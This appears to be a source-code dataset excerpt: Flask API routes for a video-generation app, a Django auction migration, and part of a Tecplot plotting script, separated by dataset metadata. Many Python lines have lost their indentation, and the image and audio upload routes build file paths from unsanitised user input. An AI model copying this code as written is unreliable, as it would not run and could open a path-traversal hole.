    The transmitted videojob JSON must contain the keys 'videojob_name', 'images', 'audio', 'sequence', 'schedule',
    'sceneList' and 'selectedInfoprovider'.
"""
video = request.json
try:
if "videojob_name" not in video:
err = flask.jsonify({"err_msg": "Missing Videojob-name"})
return err, 400
if "images" not in video:
err = flask.jsonify({"err_msg": "Missing Images"})
return err, 400
if "audio" not in video:
err = flask.jsonify({"err_msg": "Missing Audio"})
return err, 400
if "sequence" not in video:
err = flask.jsonify({"err_msg": "Missing Sequence"})
return err, 400
if "schedule" not in video:
err = flask.jsonify({"err_msg": "Missing Schedule"})
return err, 400
if "sceneList" not in video:
err = flask.jsonify({"err_msg": "Missing field 'sceneList'"})
return err, 400
if "selectedInfoprovider" not in video:
err = flask.jsonify({"err_msg": "Missing field 'selectedInfoProvider'"})
return err, 400
if not queries.insert_video_job(video):
err = flask.jsonify({"err_msg": f"There already exists a video with the name "
f"{video['videojob_name']}"})
return err, 400
return "", 204
except Exception:
logger.exception("An error occurred: ")
        err = flask.jsonify({"err_msg": "An error occurred while adding a video"})
return err, 400
@api.route("/infoprovider/schedules", methods=["GET"])
def show_schedule():
"""
    Endpoint '/infoprovider/schedules'.
    The response contains a list of entries from the table "schedule_historisation".
    Each entry contains the key schedule_historisation_id and the type of the schedule.
"""
try:
return flask.jsonify(queries.show_schedule())
except Exception:
logger.exception("An error occurred: ")
        err = flask.jsonify({"err_msg": "An error occurred while loading all schedules"})
return err, 400
@api.route("/infoprovider/showweekly", methods=["GET"])
def show_weekly():
"""
    Endpoint '/infoprovider/showweekly'.
    The response contains a list of entries from the table "schedule_historisation_weekday".
    Each entry contains the keys schedule_historisation_id, schedule_weekday_historisation_id and weekday.
"""
try:
return flask.jsonify(queries.show_weekly())
except Exception:
logger.exception("An error occurred: ")
        err = flask.jsonify({"err_msg": "An error occurred while loading all weekly schedules"})
return err, 400
@api.route("/infoprovider/all", methods=["GET"])
def get_all_infoproviders():
"""
    Endpoint `/infoprovider/all`.
    The response contains information about all infoproviders stored in the database.
"""
try:
return flask.jsonify(queries.get_infoprovider_list())
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while loading all infoproviders"})
return err, 400
@api.route("/infoprovider/<infoprovider_id>", methods=["PUT"])
def update_infoprovider(infoprovider_id):
"""
    Endpoint `/infoprovider/<infoprovider_id>`.
    Route for modifying an infoprovider.
    :param infoprovider_id: ID of the infoprovider.
    :type infoprovider_id: int
"""
updated_data = request.json
try:
if "infoprovider_name" not in updated_data:
err = flask.jsonify({"err_msg": "Missing Infoprovider-Name"})
return err, 400
if "datasources" not in updated_data:
err = flask.jsonify({"err_msg": "Missing Datasources"})
return err, 400
if "diagrams" not in updated_data:
err = flask.jsonify({"err_msg": "Missing field 'diagrams'"})
return err, 400
if "diagrams_original" not in updated_data:
            err = flask.jsonify({"err_msg": "Missing field 'diagrams_original'"})
return err, 400
        for datasource in updated_data["datasources"]:
            if "datasource_name" not in datasource:
                err = flask.jsonify({"err_msg": "Missing field 'datasource_name' in a datasource"})
                return err, 400
            if "api" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'api' in datasource {datasource['datasource_name']}"})
                return err, 400
            if "transform" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'transform' in datasource {datasource['datasource_name']}"})
                return err, 400
            if "calculates" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'calculates' for datasource {datasource['datasource_name']}"})
                return err, 400
            if "replacements" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'replacements' for datasource {datasource['datasource_name']}"})
                return err, 400
            if "storing" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'storing' in datasource {datasource['datasource_name']}"})
                return err, 400
            if "historized_data" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'historized_data' for datasource {datasource['datasource_name']}"})
                return err, 400
            if "formulas" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'formulas' in datasource {datasource['datasource_name']}"})
                return err, 400
            if "schedule" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'schedule' for datasource {datasource['datasource_name']}"})
                return err, 400
            if "listItems" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'listItems' for datasource {datasource['datasource_name']}"})
                return err, 400
update_info = queries.update_infoprovider(infoprovider_id, updated_data)
if update_info is not None:
err = flask.jsonify(update_info)
return err, 400
return flask.jsonify({"status": "successful"})
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while updating an infoprovider"})
return err, 400
@api.route("/videojob/<videojob_id>", methods=["PUT"])
def update_videojob(videojob_id):
"""
    Endpoint `/videojob/<videojob_id>`.
    Route for modifying a video job.
    :param videojob_id: ID of the video job.
    :type videojob_id: int
"""
updated_data = request.json
try:
if "videojob_name" not in updated_data:
err = flask.jsonify({"err_msg": "Missing Videojob-name"})
return err, 400
if "images" not in updated_data:
err = flask.jsonify({"err_msg": "Missing Images"})
return err, 400
if "audio" not in updated_data:
err = flask.jsonify({"err_msg": "Missing Audio"})
return err, 400
if "sequence" not in updated_data:
err = flask.jsonify({"err_msg": "Missing Sequence"})
return err, 400
if "schedule" not in updated_data:
err = flask.jsonify({"err_msg": "Missing Schedule"})
return err, 400
if "sceneList" not in updated_data:
err = flask.jsonify({"err_msg": "Missing field 'sceneList'"})
return err, 400
if "selectedInfoprovider" not in updated_data:
err = flask.jsonify({"err_msg": "Missing field 'selectedInfoProvider'"})
return err, 400
update_info = queries.insert_video_job(updated_data, update=True, job_id=videojob_id)
if update_info is not None:
err = flask.jsonify(update_info)
return err, 400
return flask.jsonify({"status": "successful"})
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while updating a videojob"})
return err, 400
@api.route("/infoprovider/<infoprovider_id>", methods=["GET"])
def get_infoprovider(infoprovider_id):
"""
    Endpoint `/infoprovider/<infoprovider_id>`.
    The response contains the JSON file of the infoprovider.
    :param infoprovider_id: ID of the infoprovider.
    :type infoprovider_id: int
"""
try:
infoprovider_json = queries.get_infoprovider(infoprovider_id)
        if infoprovider_json == {}:
err = flask.jsonify({"err_msg": "Unknown infoprovider"})
return err, 400
return flask.jsonify(infoprovider_json)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while loading an Infoprovider"})
return err, 400
@api.route("/videojob/<videojob_id>", methods=["GET"])
def get_videojob(videojob_id):
"""
    Endpoint `/videojob/<videojob_id>`.
    The response contains the JSON for the videojob.
    :param videojob_id: ID of the videojob.
    :type videojob_id: int
"""
try:
videojob_json = queries.get_videojob(int(videojob_id))
        if videojob_json == {}:
err = flask.jsonify({"err_msg": "Unknown videojob"})
return err, 400
return flask.jsonify(videojob_json)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while loading a Videojob"})
return err, 400
@api.route("/videojob/all", methods=["GET"])
def get_all_videojobs():
"""
    Endpoint `/videojob/all`.
    Route for loading information about all video jobs.
    The response contains an array with the names and IDs of all video jobs.
"""
try:
return flask.jsonify(queries.get_all_videojobs())
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while loading all Videojobs"})
return err, 400
@api.route("/infoprovider/<infoprovider_id>", methods=["DELETE"])
def delete_infoprovider(infoprovider_id):
"""
    Endpoint `/infoprovider/<infoprovider_id>`.
    Route for deleting an infoprovider.
    :param infoprovider_id: ID of the infoprovider.
    :type infoprovider_id: int
"""
try:
return flask.jsonify({"status": "successful"}) if queries.delete_infoprovider(infoprovider_id) else \
flask.jsonify({"err_msg": f"Infoprovider with ID {infoprovider_id} could not be removed"})
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while removing an infoprovider"})
return err, 400
@api.route("/infoprovider/<infoprovider_id>/logs", methods=["GET"])
def get_infoprovider_logs(infoprovider_id):
"""
    Endpoint `/infoprovider/<infoprovider_id>/logs`.
    Route for loading the logs of every datasource of an infoprovider.
    :param infoprovider_id: ID of the infoprovider.
    :type infoprovider_id: int
"""
try:
return flask.jsonify(queries.get_infoprovider_logs(infoprovider_id))
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": f"An error occurred while loading logs of an infoprovider with the ID {infoprovider_id}"})
return err, 400
@api.route("/infoprovider/<infoprovider_id>/<diagram_name>", methods=["GET"])
def get_infoprovider_test_diagram(infoprovider_id, diagram_name):
"""
    Endpoint `/infoprovider/<infoprovider_id>/<diagram_name>`.
    Route for loading the automatically generated preview of a diagram.
    :param infoprovider_id: ID of the infoprovider.
    :type infoprovider_id: int
    :param diagram_name: Name of the test diagram.
    :type diagram_name: str
"""
try:
file_path = get_temp_path(queries.get_infoprovider_name(infoprovider_id) + "/" + diagram_name + ".png")
return send_file(file_path, "application/json", True)
except Exception:
logger.exception("An error occurred: ")
        err = flask.jsonify({"err_msg": f"An error occurred while loading the diagram preview {diagram_name} of the infoprovider with the ID {infoprovider_id}"})
return err, 400
@api.route("/videojob/<videojob_id>", methods=["DELETE"])
def delete_videojob(videojob_id):
"""
    Endpoint `/videojob/<videojob_id>`.
    Route for deleting a videojob.
    :param videojob_id: ID of the videojob.
    :type videojob_id: int
"""
try:
return flask.jsonify({"status": "successful"}) if queries.delete_videojob(int(videojob_id)) else \
flask.jsonify({"err_msg": f"Videojob with ID {videojob_id} could not be removed"})
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while removing a Videojob"})
return err, 400
@api.route("/videojob/<videojob_id>/preview", methods=["GET"])
def get_videojob_preview(videojob_id):
"""
    Endpoint '/videojob/<videojob_id>/preview' (GET).
    Route for requesting the preview image of a video.
    :param videojob_id: ID of the video job whose preview should be loaded.
    :type videojob_id: int
"""
try:
file_path = queries.get_videojob_preview(videojob_id)
err = flask.jsonify({"err_msg": f"Video preview could not be loaded for a videojob with the ID {videojob_id}"})
return send_file(file_path, "application/json", True) if file_path else (err, 400)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify(
{"err_msg": f"An error occurred while loading the preview-image of a videojob with the ID {videojob_id}"})
return err, 400
@api.route("/videojob/<videojob_id>/logs", methods=["GET"])
def get_videojob_logs(videojob_id):
"""
    Endpoint `/videojob/<videojob_id>/logs`.
    Route for loading all logs of a video job.
    :param videojob_id: ID of the videojob.
    :type videojob_id: int
"""
try:
return flask.jsonify(queries.get_videojob_logs(videojob_id))
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": f"An error occurred while loading logs of a videojob with the ID {videojob_id}"})
return err, 400
@api.route("/testformula", methods=["POST"])
def testformula():
"""
    Endpoint `/testformula`.
    Route for testing a given formula.
    The response contains a boolean value indicating whether the formula is syntactically correct.
"""
formula = request.json
try:
if "formula" not in formula:
err = flask.jsonify({"err_msg": "Missing field 'formula'"})
return err, 400
tmp = queries.remove_toplevel_key(formula["formula"])
        if tmp[0].isdigit():
tmp = "|" + tmp
str2json(tmp.replace("|", "uzjhnjtdryfguljkm"))
return flask.jsonify({"accepted": True})
except SyntaxError:
return flask.jsonify({"accepted": False})
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while testing a formula"})
return err, 400
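# A hedged walk-through of the check above (the formula is hypothetical):
# "3 * a + b" starts with a digit, so it is prefixed with "|"; every "|" is
# then replaced by a placeholder identifier so the whole string parses as a
# Python expression, and str2json() raises SyntaxError only for invalid input.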
@api.route("/scene", methods=["POST"])
def add_scene():
"""
    Endpoint '/scene'.
    Route for adding a new scene. The scene JSON must contain the keys 'scene_name', 'used_images', 'used_infoproviders',
    'images', 'backgroundImage', 'backgroundType', 'backgroundColor', 'backgroundColorEnabled', 'itemCounter' and
    'scene_items'.
"""
scene = request.json
try:
if "scene_name" not in scene:
err = flask.jsonify({"err_msg": "Missing Scene-Name"})
return err, 400
if "used_images" not in scene:
err = flask.jsonify({"err_msg": "Missing list of used images"})
return err, 400
if "used_infoproviders" not in scene:
            err = flask.jsonify({"err_msg": "Missing list of used infoproviders"})
return err, 400
if "images" not in scene:
err = flask.jsonify({"err_msg": "Missing field 'images'"})
return err, 400
if "backgroundImage" not in scene:
err = flask.jsonify({"err_msg": "Missing field 'backgroundImage'"})
return err, 400
if "backgroundType" not in scene:
err = flask.jsonify({"err_msg": "Missing field 'backgroundType'"})
return err, 400
if "backgroundColor" not in scene:
err = flask.jsonify({"err_msg": "Missing field 'backgroundColor'"})
return err, 400
if "backgroundColorEnabled" not in scene:
err = flask.jsonify({"err_msg": "Missing field 'backgroundColorEnabled'"})
return err, 400
if "itemCounter" not in scene:
err = flask.jsonify({"err_msg": "Missing field 'itemCounter'"})
return err, 400
if "scene_items" not in scene:
err = flask.jsonify({"err_msg": "Missing field 'scene_items'"})
return err, 400
msg = queries.insert_scene(scene)
if msg:
err = flask.jsonify({"err_msg": msg})
return err, 400
return "", 200
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while adding a scene"})
return err, 400
@api.route("/scene/all", methods=["GET"])
def get_all_scenes():
"""
    Endpoint '/scene/all'.
    Route for loading information about all scenes.
"""
try:
return flask.jsonify(queries.get_scene_list())
except Exception:
logger.exception("An error occurred: ")
        err = flask.jsonify({"err_msg": "An error occurred while loading information about all scenes"})
return err, 400
@api.route("/scene/<id>", methods=["GET"])
def get_scene(id):
"""
    Endpoint '/scene/<id>' (GET).
    Route for loading the JSON object of a scene.
    :param id: ID of the scene to be loaded.
    :type id: int
"""
try:
scene_json = queries.get_scene(id)
if scene_json is None:
err = flask.jsonify({"err_msg": f"Could not load scene with ID {id}"})
return err, 400
return flask.jsonify(scene_json)
except Exception:
logger.exception("An error occurred: ")
        err = flask.jsonify({"err_msg": "An error occurred while loading a scene"})
return err, 400
@api.route("/scene/<id>", methods=["PUT"])
def update_scene(id):
"""
    Endpoint '/scene/<id>' (PUT).
    Route for modifying the data of a scene.
    The request must contain the JSON object that should overwrite the old one.
    :param id: ID of the scene to be overwritten.
    :type id: int
"""
updated_data = request.json
try:
if "scene_name" not in updated_data:
err = flask.jsonify({"err_msg": "Missing Scene-Name"})
return err, 400
if "used_images" not in updated_data:
err = flask.jsonify({"err_msg": "Missing list of used images"})
return err, 400
if "used_infoproviders" not in updated_data:
            err = flask.jsonify({"err_msg": "Missing list of used infoproviders"})
return err, 400
if "images" not in updated_data:
err = flask.jsonify({"err_msg": "Missing field 'images'"})
return err, 400
update_info = queries.update_scene(id, updated_data)
if update_info is not None:
err = flask.jsonify(update_info)
return err, 400
return "Successful", 200
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": f"An error occurred while updating the scene with the ID {id}"})
return err, 400
@api.route("/scene/<id>", methods=["DELETE"])
def delete_scene(id):
"""
    Endpoint '/scene/<id>' (DELETE).
    Route for deleting a scene by its ID.
    :param id: ID of the scene.
    :type id: int
"""
try:
success = queries.delete_scene(id)
return flask.jsonify({"status": "successful"}) if success else flask.jsonify({"err_msg": f"Could not remove scene with ID {id}"})
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": f"An error occurred while deleting the scene with the ID {id}"})
return err, 400
@api.route("/scene/<id>/preview", methods=["GET"])
def get_scene_preview(id):
"""
    Endpoint '/scene/<id>/preview' (GET).
    Route for requesting the preview image of a scene.
    :param id: ID of the scene.
    :type id: int
"""
try:
file_path = queries.get_scene_preview(id)
err = flask.jsonify({"err_msg": f"Scene preview could not be loaded for the scene with the ID {id}"})
return send_file(file_path, "application/json", True) if file_path else (err, 400)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": f"An error occurred while loading the preview-image of the scene with the ID {id}"})
return err, 400
@api.route("/image/<folder>", methods=["POST"])
def add_scene_image(folder):
"""
    Endpoint '/image/<folder>'.
    Route for adding a new image for a scene.
    The request form must contain the key 'name' and the image itself.
    :param folder: Specifies the folder the image is saved to. Options are "backgrounds",
                   "pictures" or "scene".
    :type folder: str
"""
try:
if folder != "backgrounds" and folder != "pictures" and folder != "scene":
err = flask.jsonify({"err_msg": "Invalid image-folder"})
return err, 400
if "image" not in request.files:
err = flask.jsonify({"err_msg": "Missing Image"})
return err, 400
if "name" not in request.form:
err = flask.jsonify({"err_msg": "Missing Image Name"})
return err, 400
image = request.files["image"]
name = f"{datetime.now().strftime('%Y-%m-%d_%H-%M.%S.%f')}_-_{request.form['name']}"
if image.filename == '':
err = flask.jsonify({"err_msg": "Missing Image Filename"})
return err, 400
if not _check_image_extention(image.filename):
err = flask.jsonify({"err_msg": "Invalid file extension"})
return err, 400
file_extension = secure_filename(image.filename).rsplit(".", 1)[1]
file_path = queries.get_image_path(name, folder, file_extension)
if path.exists(file_path):
err = flask.jsonify({"err_msg": "Invalid Image Name (Image maybe exists already)"})
return err, 400
image_id = queries.insert_image(name + "." + file_extension, folder)
if not image_id:
err = flask.jsonify({"err_msg": "Image could not be added to the database"})
return err, 400
image.save(file_path)
msg = flask.jsonify({"image_id": image_id,
"path": file_path})
return msg, 200
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while adding an image"})
return err, 400
@api.route("/image/all/<folder>", methods=["GET"])
def get_all_scene_images(folder):
"""
    Endpoint '/image/all/<folder>'.
    Route for retrieving information about all images in a given folder.
    Valid folders are 'backgrounds', 'pictures' and 'scene'.
    The response contains a list of image elements. Each image element contains the ID, the name and the image itself.
    :param folder: Specifies the folder whose images are listed. Options are "backgrounds",
                   "pictures" or "scene".
    :type folder: str
"""
try:
if folder != "backgrounds" and folder != "pictures" and folder != "scene":
err = flask.jsonify({"err_msg": "Invalid image-folder"})
return err, 400
images = queries.get_image_list(folder)
return flask.jsonify(images)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": f"An error occurred while loading information about all images of the folder {folder}"})
return err, 400
@api.route("/image/<id>", methods=["GET"])
def get_image(id):
"""
    Endpoint '/image/<id>' (GET).
    Route for loading a scene image.
    :param id: ID of the image to be sent.
    :type id: int
"""
try:
file_path = queries.get_scene_image_file(id)
return send_file(file_path, "application/json", True)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while loading a scene-image"})
return err, 400
@api.route("/image/<id>", methods=["DELETE"])
def delete_scene_image(id):
"""
    Endpoint '/image/<id>' (DELETE).
    Route for deleting a scene image.
    :param id: ID of the image to be deleted.
    :type id: int
"""
try:
success = queries.delete_scene_image(id)
return flask.jsonify({"success": success})
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while deleting an image"})
return err, 400
@api.route("/thumbnailpreview", methods=["POST"])
def set_preview():
"""
    Endpoint `/thumbnailpreview`.
    Allows a scene to be set as the preview of a video.
    The request must be a JSON containing the keys 'videojob_id' and 'scene_id', where 'scene_id' is the ID of the
    scene to be used as the preview.
"""
data = request.json
try:
if "videojob_id" not in data:
err = flask.jsonify({"err_msg": "Missing field 'videojob_id'"})
return err, 400
if "scene_id" not in data:
err = flask.jsonify({"err_msg": "Missing field 'scene_id'"})
return err, 400
msg = queries.set_videojob_preview(data["videojob_id"], data["scene_id"])
if msg:
err = flask.jsonify(msg)
return err, 400
return "", 200
except Exception:
logger.exception("An error occurred: ")
        err = flask.jsonify({"err_msg": "An error occurred while setting a scene as the preview of a video"})
return err, 400
@api.route("/topics", methods=["GET"])
def topics():
"""
    Endpoint `/topics`.
    The response contains the list of topics available for video generation.
"""
try:
return flask.jsonify(queries.get_topic_names())
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while retrieving the list of topics"})
return err, 400
@api.route("/topic", methods=["PUT"])
def add_topic():
"""
    Endpoint `/topic`.
    Route for adding a topic.
"""
try:
if "config" not in request.files:
err = flask.jsonify({"err_msg": "Missing File"})
return err, 400
if "name" not in request.form:
err = flask.jsonify({"err_msg": "Missing Topic name"})
return err, 400
file = request.files["config"]
name = request.form["name"]
if file.filename == '':
err = flask.jsonify({"err_msg": "Missing File"})
return err, 400
if not _check_json_extention(file.filename):
            err = flask.jsonify({"err_msg": "Invalid file extension"})
return err, 400
filename = secure_filename(file.filename).rsplit(".", 1)[0]
file_path = queries._get_steps_path(filename)
if path.exists(file_path):
err = flask.jsonify({"err_msg": "Invalid File Name (File maybe exists already)"})
return err, 400
queries.add_topic(name, filename)
file.save(queries._get_steps_path(filename))
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred"})
return err, 500
@api.route("/image", methods=["PUT"])
def add_image():
"""
    Endpoint `/image`.
    Route for adding an image for a topic.
"""
try:
if "image" not in request.files:
err = flask.jsonify({"err_msg": "Missing Image"})
return err, 400
if "name" not in request.form:
err = flask.jsonify({"err_msg": "Missing Image Name"})
return err, 400
if "folder" in request.form:
folder = request.form["folder"]
else:
folder = ''
image = request.files["image"]
name = request.form["name"]
if image.filename == '':
err = flask.jsonify({"err_msg": "Missing Image"})
return err, 400
if not _check_image_extention(image.filename):
err = flask.jsonify({"err_msg": "Invalid file extension"})
return err, 400
file_extension = secure_filename(image.filename).rsplit(".", 1)[1]
file_path = queries.get_image_path(name, folder, file_extension)
if path.exists(file_path):
err = flask.jsonify({"err_msg": "Invalid Image Name (Image maybe exists already)"})
return err, 400
image.save(file_path)
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred"})
return err, 500
@api.route("/audio", methods=["PUT"])
def add_audio():
"""
    Endpoint `/audio`.
    Route for adding an audio file.
"""
try:
if "audio" not in request.files:
err = flask.jsonify({"err_msg": "Missing Audio File"})
return err, 400
if "name" not in request.form:
err = flask.jsonify({"err_msg": "Missing Audio File Name"})
return err, 400
audio = request.files["audio"]
name = request.form["name"]
if audio.filename == '':
err = flask.jsonify({"err_msg": "Missing Audio Name"})
return err, 400
if not _check_mp3_extention(audio.filename):
err = flask.jsonify({"err_msg": "Invalid file extension"})
return err, 400
file_path = queries._get_audio_path(name)
if path.exists(file_path):
err = flask.jsonify({"err_msg": "Invalid Audio File Name (Audio File maybe exists already)"})
return err, 400
audio.save(file_path)
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred"})
return err, 500
@api.route("/topic/<topic_id>", methods=["GET"])
def get_topic(topic_id):
"""
    Endpoint `/topic/<topic_id>`.
    The response contains the topic's JSON file.
"""
try:
file_path = queries.get_topic_file(topic_id)
if file_path is None:
err = flask.jsonify({"err_msg": "Unknown topic"})
return err, 400
return send_file(file_path, "application/json", True)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred"})
return err, 400
@api.route("/topic/<topic_id>", methods=["DELETE"])
def delete_topic(topic_id):
"""
    Endpoint `/topic/<topic_id>`.
    Route for deleting a topic.
"""
try:
queries.delete_topic(topic_id)
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred"})
return err, 400
@api.route("/params/<topic_id>", methods=["GET"])
def params(topic_id):
"""
    Endpoint `/params/<topic_id>`.
    URL parameter: <topic_id>.
    The response contains the parameter information for the given topic.
"""
try:
params = queries.get_params(topic_id)
        if params is None:
err = flask.jsonify({"err_msg": "Unknown topic"})
return err, 400
return flask.jsonify(params)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while retrieving the parameters for Topic ID: " + topic_id})
        return err, 400
@api.route("/jobs", methods=["GET"])
def jobs():
"""
    Endpoint `/jobs`.
    The response contains the jobs stored in the database.
"""
try:
return flask.jsonify(queries.get_job_list())
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while retrieving the list of jobs"})
return err, 400
@api.route("/add", methods=["POST"])
def add():
"""
    Endpoint `/add`.
    The request body contains the information for the new job in JSON format.
"""
job = request.json
try:
queries.insert_job(job)
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while adding the job"})
return err, 400
@api.route("/edit/<job_id>", methods=["PUT"])
def edit(job_id):
"""
    Endpoint `/edit/<job_id>`.
    Updates the job database entry with the given ID.
    The request body contains the information with which the job should be updated.
    :param job_id: URL parameter <job_id>
    :type job_id: str
"""
updated_job_data = request.json
try:
queries.update_job(job_id, updated_job_data)
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while updating job information"})
return err, 400
@api.route("/remove/<job_id>", methods=["DELETE"])
def remove(job_id):
"""
    Endpoint `/remove/<job_id>`.
    Deletes the job database entry with the given ID.
    :param job_id: URL parameter <job_id>
    :type job_id: str
"""
try:
queries.delete_job(job_id)
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while deleting the job"})
return err, 400
@api.route("/logs", methods=["GET"])
def logs():
"""
    Endpoint `/logs`.
    Returns the logs of the jobs.
"""
try:
return flask.jsonify(queries.get_logs())
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while getting the logs"})
return err, 400
def _check_json_extention(filename):
return "." in filename and filename.rsplit(".", 1)[1].lower() == "json"
def _check_mp3_extention(filename):
return "." in filename and filename.rsplit(".", 1)[1].lower() == "mp3"
def _check_image_extention(filename):
    return "." in filename and filename.rsplit(".", 1)[1].lower() in ("png", "jpeg", "jpg")
| 33.898974 | 137 | 0.620652 |
c2d0f1f1858066ddbc5efc00de7b1529da6e06e4
| 2,172 |
py
|
Python
|
saku/auction/migrations/0001_initial.py
|
Mehdi-MosTafavi/Saku-Backend
|
348a1a676ffc8ddd9077f8c94733c5f6dce98fbd
|
[
"MIT"
] | null | null | null |
saku/auction/migrations/0001_initial.py
|
Mehdi-MosTafavi/Saku-Backend
|
348a1a676ffc8ddd9077f8c94733c5f6dce98fbd
|
[
"MIT"
] | null | null | null |
saku/auction/migrations/0001_initial.py
|
Mehdi-MosTafavi/Saku-Backend
|
348a1a676ffc8ddd9077f8c94733c5f6dce98fbd
|
[
"MIT"
] | null | null | null |
# Generated by Django 4.0.3 on 2022-04-23 09:21
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
],
options={
'db_table': 'saku_category',
},
),
migrations.CreateModel(
name='Tags',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
],
options={
'db_table': 'saku_Tags',
},
),
migrations.CreateModel(
name='Auction',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_created=True)),
('name', models.CharField(max_length=20)),
('token', models.CharField(max_length=8, unique=True)),
('finished_at', models.DateTimeField()),
('mode', models.IntegerField(choices=[(1, 'Increasing'), (2, 'Decreasing')], default=1)),
('limit', models.IntegerField(default=0)),
('is_private', models.BooleanField(default=False)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='auction.category')),
('tags', models.ManyToManyField(to='auction.tags')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'saku_auction',
},
),
]
| 38.105263 | 119 | 0.558471 |
66148cb9223c8b7fc9637bef4bdaade367fee468
| 2,939 |
py
|
Python
|
Python/plotSurfaceMachContour.py
|
guillaumetousignant/euler3D
|
7bdfaae7f6b774232b6fc9f83d40a67ccee9a8ae
|
[
"MIT"
] | 1 |
2019-02-11T00:45:37.000Z
|
2019-02-11T00:45:37.000Z
|
Python/plotSurfaceMachContour.py
|
guillaumetousignant/euler3D
|
7bdfaae7f6b774232b6fc9f83d40a67ccee9a8ae
|
[
"MIT"
] | null | null | null |
Python/plotSurfaceMachContour.py
|
guillaumetousignant/euler3D
|
7bdfaae7f6b774232b6fc9f83d40a67ccee9a8ae
|
[
"MIT"
] | null | null | null |
import tecplot
import numpy as np
import math
import string
from tecplot.exception import *
from tecplot.constant import *
class plotSurfaceMachContour(object):
def __init__(self, mySurfaceFlowFile, Type):
print("plotMachContour.................................................");
self.mySurfaceFlowFile_ = mySurfaceFlowFile;
self.type_ = Type;
if self.type_ == 0: #EULER
dataset = tecplot.data.load_tecplot_szl(self.mySurfaceFlowFile_, read_data_option=2);
elif self.type_ == 1: #SU2
dataset = tecplot.data.load_tecplot(self.mySurfaceFlowFile_, read_data_option=2);
frame = tecplot.active_frame();
plot = frame.plot(PlotType.Cartesian3D)
plot.activate()
plot.show_contour = True;
if self.type_ == 0: # EULER
plot.contour(0).variable = dataset.variable(9);
elif self.type_ == 1: # SU2
plot.contour(0).variable = dataset.variable(11);
# Set Rainbow
plot.contour(0).colormap_name = 'Small Rainbow';
# Set View
plot.view.width = 1.91291;
plot.view.alpha = -47.73;
plot.view.theta = 137.32;
plot.view.psi = 136.51;
plot.view.position = (-6.57402, 7.48889, -10.3657);
# Save layout for Tecplot
print("Save MachContour_fullbody.lay...................................");
tecplot.save_layout('../Python/lay/MachContour_fullbody.lay');
print("Save MachContour_fullbody.lay...............................DONE");
# export image of full body
print("Save MachContour_fullbody.png...................................");
tecplot.export.save_png('../Python/png/MachContour_fullbody.png', 2000, supersample=3);
print("Save MachContour_fullbody.png...............................DONE");
plot = frame.plot(PlotType.Cartesian2D)
plot.activate()
plot.show_contour = True;
if self.type_ == 0: # EULER
plot.contour(0).variable = dataset.variable(9);
elif self.type_ == 1: # SU2
plot.contour(0).variable = dataset.variable(11);
plot.axes.x_axis.show = False;
plot.axes.y_axis.show = False;
